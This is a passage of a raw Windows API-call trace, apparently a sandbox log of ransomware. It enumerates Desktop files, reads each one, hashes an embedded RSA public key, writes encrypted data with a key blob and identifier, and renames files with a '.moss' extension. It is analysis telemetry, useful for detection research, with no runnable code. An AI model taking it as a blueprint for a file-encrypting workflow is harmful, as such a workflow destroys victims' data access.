hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2e0 | out: hHeap=0xcd0000) returned 1 [0170.243] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x108) returned 0x3aa26a0 [0170.243] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fc290 | out: hHeap=0xcd0000) returned 1 [0170.244] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x200) returned 0x3b48a38 [0170.244] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3aa2588 | out: hHeap=0xcd0000) returned 1 [0170.244] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0xdc53e8 [0170.244] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd280 | out: hHeap=0xcd0000) returned 1 [0170.244] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ebf0 | out: hHeap=0xcd0000) returned 1 [0170.244] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35ceae8 | out: hHeap=0xcd0000) returned 1 [0170.244] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc53e8 | out: hHeap=0xcd0000) returned 1 [0170.244] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e0a10 | out: hHeap=0xcd0000) returned 1 [0170.244] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3aa26a0 | out: hHeap=0xcd0000) returned 1 [0170.244] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0170.244] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48a38 | out: hHeap=0xcd0000) returned 1 [0170.244] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f7c30 | out: hHeap=0xcd0000) returned 1 [0170.244] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2a0 | out: hHeap=0xcd0000) returned 1 [0170.244] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fc2c0 | out: hHeap=0xcd0000) returned 1 [0170.244] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd330 | out: hHeap=0xcd0000) returned 1 [0170.244] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbc90 | out: hHeap=0xcd0000) returned 1 [0170.244] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e0a50 | out: hHeap=0xcd0000) returned 1 [0170.244] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fc2a8 | out: hHeap=0xcd0000) returned 1 [0170.244] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fc278 | out: hHeap=0xcd0000) returned 1 [0170.244] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35deb08 | out: hHeap=0xcd0000) returned 1 [0170.244] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a70 | out: hHeap=0xcd0000) returned 1 [0170.244] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd57fe0 | out: hHeap=0xcd0000) returned 1 [0170.244] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fc260 | out: hHeap=0xcd0000) returned 1 [0170.244] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4c0d0 | out: hHeap=0xcd0000) returned 1 [0170.245] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44ac8 | out: hHeap=0xcd0000) returned 1 [0170.245] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd23a00 | out: hHeap=0xcd0000) returned 1 [0170.245] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362cad8 | out: hHeap=0xcd0000) returned 1 [0170.245] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3aa2470 | out: hHeap=0xcd0000) returned 1 [0170.245] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e06d0 | out: hHeap=0xcd0000) returned 1 [0170.245] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd290 | out: hHeap=0xcd0000) returned 1 [0170.245] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e0a70 | out: hHeap=0xcd0000) returned 1 [0170.245] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3613610 | out: hHeap=0xcd0000) returned 1 [0170.245] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44498 | out: hHeap=0xcd0000) returned 1 [0170.245] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b88 | out: hHeap=0xcd0000) returned 1 [0170.245] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b39e58 | out: hHeap=0xcd0000) returned 1 [0170.245] WriteFile (in: hFile=0x664, lpBuffer=0x3b62d40*, nNumberOfBytesToWrite=0x15e6e, lpNumberOfBytesWritten=0x401fb14, lpOverlapped=0x0 | out: lpBuffer=0x3b62d40*, lpNumberOfBytesWritten=0x401fb14*=0x15e6e, lpOverlapped=0x0) returned 1 [0170.245] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b62d40 | out: hHeap=0xcd0000) returned 1 [0170.245] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x15e73, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0170.245] WriteFile (in: hFile=0x664, lpBuffer=0x3b44690*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x3b44690*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0170.246] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44690 | out: hHeap=0xcd0000) returned 1 [0170.246] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0170.246] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x428) returned 0x3b48820 [0170.246] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW", cchWideChar=-1, lpMultiByteStr=0x3b48820, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW", lpUsedDefaultChar=0x0) returned 41 [0170.246] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x430) returned 0x3b48c50 [0170.246] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0170.246] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0170.246] WriteFile (in: hFile=0x664, lpBuffer=0x3b48c50*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x3b48c50*, lpNumberOfBytesWritten=0x401fb50*=0x28, lpOverlapped=0x0) returned 1 [0170.246] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48c50 | out: hHeap=0xcd0000) returned 1 [0170.246] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0170.246] WriteFile (in: hFile=0x664, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x401fb50*=0x26, lpOverlapped=0x0) returned 1 [0170.246] CloseHandle (hObject=0x664) returned 1 [0170.248] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ebf0 [0170.248] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x880) returned 0x3b4b098 [0170.248] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ebf0 | out: hHeap=0xcd0000) returned 1 [0170.248] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xxuaxzQ\\2X6VH2.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xxuaxzq\\2x6vh2.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xxuaxzQ\\2X6VH2.m4a.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xxuaxzq\\2x6vh2.m4a.moss")) returned 1 [0170.249] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0170.249] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0170.249] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0170.250] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd80bd8 | out: hHeap=0xcd0000) returned 1 [0170.250] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42482070, ftCreationTime.dwHighDateTime=0x1d5e7f3, ftLastAccessTime.dwLowDateTime=0xe27af3f0, ftLastAccessTime.dwHighDateTime=0x1d5e5ce, ftLastWriteTime.dwLowDateTime=0xe27af3f0, ftLastWriteTime.dwHighDateTime=0x1d5e5ce, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="eL7ZGLErx", cAlternateFileName="EL7ZGL~1")) returned 1 [0170.250] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0170.250] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa6) returned 0x35e3330 [0170.250] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0170.250] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ebf0 [0170.250] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa8) returned 0x35e3280 [0170.251] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0170.251] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2f0b8 [0170.251] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f2840 [0170.251] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2eb68 [0170.251] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f2a20 | out: hHeap=0xcd0000) returned 1 [0170.251] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2e8c0 | out: hHeap=0xcd0000) returned 1 [0170.251] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f2c00 | out: hHeap=0xcd0000) returned 1 [0170.251] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2dd98 | out: hHeap=0xcd0000) returned 1 [0170.251] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f2b10 | out: hHeap=0xcd0000) returned 1 [0170.251] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2dd98 [0170.251] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ebf0 | out: hHeap=0xcd0000) returned 1 [0170.251] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e3330 | out: hHeap=0xcd0000) returned 1 [0170.251] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf32359e0, ftCreationTime.dwHighDateTime=0x1d5d8b8, ftLastAccessTime.dwLowDateTime=0x7c2ce1a0, ftLastAccessTime.dwHighDateTime=0x1d5dfd2, ftLastWriteTime.dwLowDateTime=0x7c2ce1a0, ftLastWriteTime.dwHighDateTime=0x1d5dfd2, nFileSizeHigh=0x0, nFileSizeLow=0x81e8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Fes_XROkSU6uT2U.png", cAlternateFileName="FES_XR~1.PNG")) returned 1 [0170.251] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0170.251] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x90) returned 0xd80bd8 [0170.251] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0170.251] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xxuaxzQ\\Fes_XROkSU6uT2U.png") returned=".png" [0170.251] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xxuaxzQ\\Fes_XROkSU6uT2U.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xxuaxzq\\fes_xroksu6ut2u.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0170.251] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=33256) returned 1 [0170.251] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0170.255] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x81c2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0170.255] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0170.256] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0170.257] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0170.257] SetFilePointer (in: hFile=0x664, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0170.257] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0x81e8, lpOverlapped=0x0) returned 1 [0170.257] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0170.257] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f3) returned 0x3b39e58 [0170.257] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0170.257] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0170.257] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2ebf0) returned 1 [0170.259] CryptCreateHash (in: hProv=0xd2ebf0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0170.259] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0170.259] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0170.259] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x11) returned 0x35e06d0 [0170.259] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0170.259] GetLastError () returned 0x0 [0170.259] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0170.259] CryptReleaseContext (hProv=0xd2ebf0, dwFlags=0x0) returned 1 [0170.259] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b39e58 | out: hHeap=0xcd0000) returned 1 [0170.259] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0170.259] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0170.259] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0170.259] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0170.259] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0170.259] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0170.260] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x81f0) returned 0x3b53ea8 [0170.260] SetFilePointer (in: hFile=0x664, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0170.260] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b88 | out: hHeap=0xcd0000) returned 1 [0170.260] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f0) returned 0x3b39e58 [0170.260] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0170.260] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f0) returned 0x3b44498 [0170.260] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x58) returned 0x3613610 [0170.260] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b4c0d0 [0170.260] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fc260 [0170.260] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b4c118 [0170.260] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fc278 [0170.260] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fc2a8 [0170.260] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbc90 [0170.260] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fc2c0 [0170.260] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x24) returned 0x35f9e20 [0170.260] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x158) returned 0x3b51ec0 [0170.261] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0170.261] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x558) returned 0x3b48820 [0170.261] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fc2a8 | out: hHeap=0xcd0000) returned 1 [0170.261] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fc2c0 | out: hHeap=0xcd0000) returned 1 [0170.261] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbc90 | out: hHeap=0xcd0000) returned 1 [0170.261] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f9e20 | out: hHeap=0xcd0000) returned 1 [0170.261] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0170.261] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbc90 [0170.261] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd290 [0170.261] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fc2c0 [0170.261] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x18) returned 0x35e0a70 [0170.261] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x9) returned 0x35fc2a8 [0170.261] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd330 [0170.261] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10e) returned 0x3b44690 [0170.261] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c6d8 [0170.261] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x58) returned 0x36136d0 [0170.261] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e06d0 [0170.261] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x104) returned 0x3aa2470 [0170.261] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e0a50 [0170.261] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2a0 [0170.261] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44690 | out: hHeap=0xcd0000) returned 1 [0170.262] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fc2c0 | out: hHeap=0xcd0000) returned 1 [0170.262] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd330 | out: hHeap=0xcd0000) returned 1 [0170.262] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fc2a8 | out: hHeap=0xcd0000) returned 1 [0170.262] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e0a70 | out: hHeap=0xcd0000) returned 1 [0170.262] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd290 | out: hHeap=0xcd0000) returned 1 [0170.262] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbc90 | out: hHeap=0xcd0000) returned 1 [0170.262] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0170.262] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3613610 | out: hHeap=0xcd0000) returned 1 [0170.262] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b5ed58 | out: hHeap=0xcd0000) returned 1 [0170.262] GetCurrentThreadId () returned 0x324 [0170.262] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0x3b44690 [0170.262] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x82) returned 0x3b4a070 [0170.262] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x2c) returned 0x3608a70 [0170.262] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ebf0 [0170.262] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x148) returned 0x35deb08 [0170.262] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd290 [0170.262] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd330 [0170.262] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0xd57fe0 [0170.263] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0170.263] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0170.263] GetCurrentThreadId () returned 0x324 [0170.263] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0170.263] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0170.263] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xeb) returned 0x35ceae8 [0170.263] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0170.263] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0170.263] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0170.263] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0170.263] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35ceae8 | out: hHeap=0xcd0000) returned 1 [0170.263] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0x35ceae8 [0170.263] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd290 | out: hHeap=0xcd0000) returned 1 [0170.263] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4c) returned 0x362cad8 [0170.263] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd290 [0170.263] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0xd23a00 [0170.263] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd280 [0170.263] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbc90 [0170.263] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd280 | out: hHeap=0xcd0000) returned 1 [0170.263] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd280 [0170.263] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2e0 [0170.263] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2f0 [0170.263] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd300 